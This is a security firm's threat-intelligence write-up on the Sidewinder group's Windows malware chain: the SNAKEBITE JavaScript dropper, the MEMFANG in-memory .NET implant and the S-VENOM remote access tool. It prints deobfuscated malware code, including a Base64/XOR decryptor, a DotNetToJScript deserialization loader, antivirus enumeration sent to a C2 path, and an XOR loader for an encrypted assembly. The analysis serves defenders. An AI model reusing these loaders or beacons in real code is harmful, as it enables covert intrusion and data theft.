Exposing Sidewinder’s Arsenal Against Windows
While chasing the spear-phishing campaigns carried out in the South-Asian region by the well-known threat activity group "Sidewinder" (a.k.a Rattlesnake, T-APT-04), Ebryx research team witnessed the evolution of Sidewinder’s tactics and arsenal as it made attempts to evade detection and achieve its operational objectives.
- May 22, 2025
Background
While chasing the spear-phishing campaigns carried out in the South-Asian region by the well-known threat activity group “Sidewinder” (a.k.a Rattlesnake, T-APT-04), Ebryx research team witnessed the evolution of Sidewinder’s tactics and arsenal as it made attempts to evade detection and achieve its operational objectives. Sidewinder’s tools of choice for targeting Windows based machines primarily consist of three malware strains that we identify as SNAKEBITE – a JavaScript-based dropper, MEMFANG – an in-memory implant, and S-VENOM – a RAT used by Sidewinder for accessing compromised Windows machines.
SNAKEBITE
SNAKEBITE is a JavaScript based dropper that is not unique in nature instead an amalgam of a custom decryption technique and open-source offensive tools. The part that consists of open-source tools is a modified Starfighters implementation of Koadic (an information gathering implant to perform post-exploitation reconnaissance on the victim machine) to load the payload in-memory.
Majority of the code in SNAKEBITE is obscured and encrypted via customized encryption. The decryption sequence consists of Base64 decode followed by XOR – the key for which is calculated at the time of execution. Primarily, an embedded phrase is decoded using Base64 and XORed with another embedded string. The resulting key is stored in the variable “keeee” and is used as the XOR decryption key for the rest of the payload. The aforementioned sequence is continued for every encrypted string which ultimately unravels the assembly payload embedded within the script.
function qdeH(str) { var b64 = "qfU3vnNPFuaV8WcilGXYm0Rg2AS
LM1HIkjKxJh
wd7OZy6toz5Eep4rDbsTBQC9+/="; var b, result = "", r1, r2, i = 0; for (; i <
str.length;) { b = b64.indexOf(str.charAt(i++)) << 18 |
b64.indexOf(str.charAt(i++)) << 12 | (r1 = b64.indexOf(str.charAt(i++)))
<< 6 | (r2 = b64.indexOf(str.charAt(i++))); result += r1 === 64 ?
QpmXHA(b >> 16 & 255) : r2 === 64 ? QpmXHA(b >> 16 & 255, b >> 8 &
255) : QpmXHA(b >> 16 & 255, b >> 8 & 255, b & 255); } return
result;};function QeTPECI (key, bytes){ var res = []; for (var i = 0; i <
bytes.length; ) { for (var j = 0; j < key.length; j++) {
res.push(QpmXHA((bytes.charCodeA
t(i)) ^ key.charCodeAt(j))); i++; if (i >= bytes.length) { j = key.length; } } }
return res.join("")}function PMKDTYDd(bsix){ return
QeTPECI(keeee,qdeH(bsix))}var keeee =
QeTPECI("dDsB",qdeH("mdn"+"n1n
"+"Wbl"+"Pu1"
)); Snippet 1: The Base64 and XOR decryption sequence
SNAKEBITE utilizes Starfighters (an in-memory launcher that has also been included in the Koadic framework as an implant) to deploy the MEMFANG implant directly into memory. The modified payload is a .NET assembly converted to javascript using DotNetToJScript.
var dash = "";var enc = new ActiveXObject("System.Text.ASCIIEn
coding");var length = enc["GetByteCount_2"](b);var ba =
enc["GetBytes_4"](b);var transform = new
ActiveXObject("System.Security.Cryp
tography.Fro
mBase64Transform");ba = transform["TransformFinalBlock"](ba, 0,
length);var ms = new ActiveXObject("System.IO.MemoryS
tream");ms.
Write(ba, 0, (length / 4) * 3);ms.Position = 0;dash = ms;var so = var stm
= Func4(so.split(".").join(''));var fmt = new
ActiveXObject("System.Runtime.Ser
ialization.For
matters.Binary.BinaryFormatter");var al = new
ActiveXObject("System.Collections.A
rrayList");var d = fmt["Deserialize_2"](dash);al.Add(undefined);var o =
d["DynamicInvoke"](al.ToArray())["CreateInstance"](ec); Snippet 2: Deobfuscated Starfighters snippet from a variant of SNAKEBITE
Starfighters implementation in SNAKEBITE requires setting the .NET version before execution which is achieved by checking for the subfolders in .NET installation directory using
FSO.GetFolder(FSO.GetSpecialFolder(0
)+”Microsoft.NETFramework”).SubFolders;. Once the .NET version is set, information regarding the installed Antivirus product is collected by querying the WMI service and later sent to the C2 server.
var objWMIService = GetObject(“winmgmts:\.rootSecurityC
enter2”);
var colItems = objWMIService.ExecQuery(“Select * From
AntiVirusProduct”, null, 48);var shells = new ActiveXObject("WScript.Shell");functi
on MfNZUM(){ var net = ""; var FSO = new ActiveXObject("Scripting.FileSystem
Object"); var folds = FSO.GetFolder(FSO.GetSpecialFolder
(0)+"Micro
soft.NETFramework ").SubFolders; e = new Enumerator(folds); var folder; e.moveFirst(); while (e.atEnd() == false) { folder = e.item(); var files = folder.files; var fileEnum = new Enumerator(files); fileEnum.moveFirst(); while(fileEnum.atEnd() == false){ if(fileEnum.item().Name == "csc.exe") { if(folder.Name.substring(0,2)=="v2") return "v2.0.50727"; else if(folder.Name.substring(0,2)=="v4") return "v4.0.30319"; } fileEnum[moveNext](); } e[moveNext](); } return folder.Name;}ver = v2.0.50727;try { ver = MfNZUM();} catch(e) { ver = "v2.0.50727";}shells.Environment
("Process")(COMPLUS_Version) = ver;;var objWMIService = GetObject("winmgmts:\.rootSecurity
Center2");var colItems = objWMIService.ExecQuery("Select * From AntiVirusProduct", null, 48);var objItem = new Enumerator(colItems); var x = "";for (; !objItem.atEnd(); objItem[moveNext]()) { x += (objItem.item().displayName + " " + objItem.item().productState).replace
(" ", "");}if(x && x.length){ x = x + "_stg1";}var aUrl = "/plugins/16364/11542/true/true/"+x;
o.pink("/cgi/8ee
4d36866/16364/11542/58a3a04b/
file.hta",aUrl,da,)} catch (e) {}finally{window.close();}}catch (e) {}finally{window.close();} Snippet 3: Finding installed Antivirus product, followed by a call to C2 address
MEMFANG
MEMFANG is a .NET implant that is embedded inside SNAKEBITE and deployed directly in-memory via Starfighters. Using a DynamicInvoke call, it sideloads the DLL file to decrypt and load the payload, inside a randomly named encrypted .tmp file.
The decryption mechanism utilizes the first 32 bytes of the data in the .tmp file to perform a byte-wise XOR. This results in the decrypted assembly stored in “array2″ which is then loaded and executed in memory.
static Program(){ byte[] array = File.ReadAllBytes(Path.Combine(
Path.GetDirectoryName(Assembly.
GetExecutingAssembly().Loc
ation), "LwBFLmM.tmp".Trim())); byte[] array2 = new byte[array.Length - 32]; Buffer.BlockCopy(array, 32, array2, 0, array2.Length); for (int i = 0; i < array2.Length; i++) { byte[] array3 = array2; int num = i; array3[num] ^= array[i % 32]; } Program._assembly = Assembly.Load(array2);} Snippet 4: MEMFANG decryption scheme to load the RAT in memory
S-VENOM
The decrypted payload injected into memory by MEMFANG implant acts as a Remote Access Tool for the operators. The RAT, identified as S-VENOM, is modular in nature and has several functionalities to collect information from the compromised host. This collected information is relayed back to the command and control server by means of a custom-developed web client. Following information is collected by the S-VENOM post-intrusion:
S-VENOM traverses over the registry key, “SoftwareMicrosoftWindowsCurrentVersionUninstall“, to find all installed applications on the system with a valid uninstallation path.
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey
("Software\Microsoft\Windows\
CurrentVersion\Uninstall")){ foreach (string name in registryKey.GetSubKeyNames()) { using (RegistryKey registryKey2 = registryKey.OpenSubKey(name)) { if (registryKey2 != null) { string text = registryKey2.GetValue("DisplayNam
e") as string;if (text != null){ jsonWriter.WriteStartObject(); jsonWriter.WritePropertyName
("Name");jsonWriter.WriteValue(text)
;jsonWriter.WritePropertyName
("Version");jsonWriter.WriteValue
(registryKey2.GetValue
("DisplayVersion")); jsonWriter.WriteEndObject();} } }} Snippet 5: Traversing the registry key to find installed software
Using the Windows Management Instrumentation (WMI) framework, S-VENOM attempts to enumerate all operating Antivirus and Antispyware products on the system.
jsonWriter.WritePropertyName
("antiVirusProdu
ct");SysInfo.WriteWmi(jsonWriter, "antiVirusProduct", "root\SecurityCenter2", new string[]{ "displayName", "ProductState", "TimeStamp"});jsonWriter.Write
PropertyName
("antiSpywareProduct");SysInfo.Writ
eWmi(jsonWriter, "antiSpywareProduct", "root\SecurityCenter2", new string[]{ "displayName", "ProductState", "TimeStamp"}); Snippet 6: Using WMI to find installed Antivirus product
Retrieve Access Tokens
Using the GetTokenInformation API call from advapi32.dll, the tool returns in-depth information about each access token on the system.
Gather System Information
Apart from collecting information about Security Solutions, S-VENOM is also capable of collecting identifying information about the compromised host using WMI classes such as Win32_UserAccount, Win32_ComputerSystem, Win32_Process, Win32_OperatingSystem, Win32_TimeZone, and others.
Enumerate Disks
S-VENOM enumerates all available disks along with collection of data such as free and used space, its label, and the formatting of the drive. Once collected, it begins enumerating folders and files inside each drive and their creation-access-modification times for exfiltration.
Gather Network Information
S-VENOM collects network information from all available interfaces using the GetAllNetworkInterfaces call. Collected data includes MAC addresses, DNS servers, gateways, speeds, DHCP servers, and operational status of each interface.
Tactics, Techniques and Procedures
SNAKEBITE
MEMFANG
S-VENOM
Outlook
The current arsenal of Sidewinder against the Windows based systems indicates their heavy utilization of open-source offensive tools and latest vulnerabilities or POCs shared by Google Project Zero. Koadic framework has also reportedly been used by other advanced threat activity groups like MuddyWater and APT28.
SideWinder’s continued usage of open-source tooling points to two potential scenarios; conservation of resources by using open-source tools despite public coverage and detection or an intentional effort to make attribution hard for defenders.
Coverage of the techniques implemented by such malware can significantly improve detection of similar intrusions and allow blue-teams to respond to threats that really matter contrary to chasing compliance checks or IOCs.
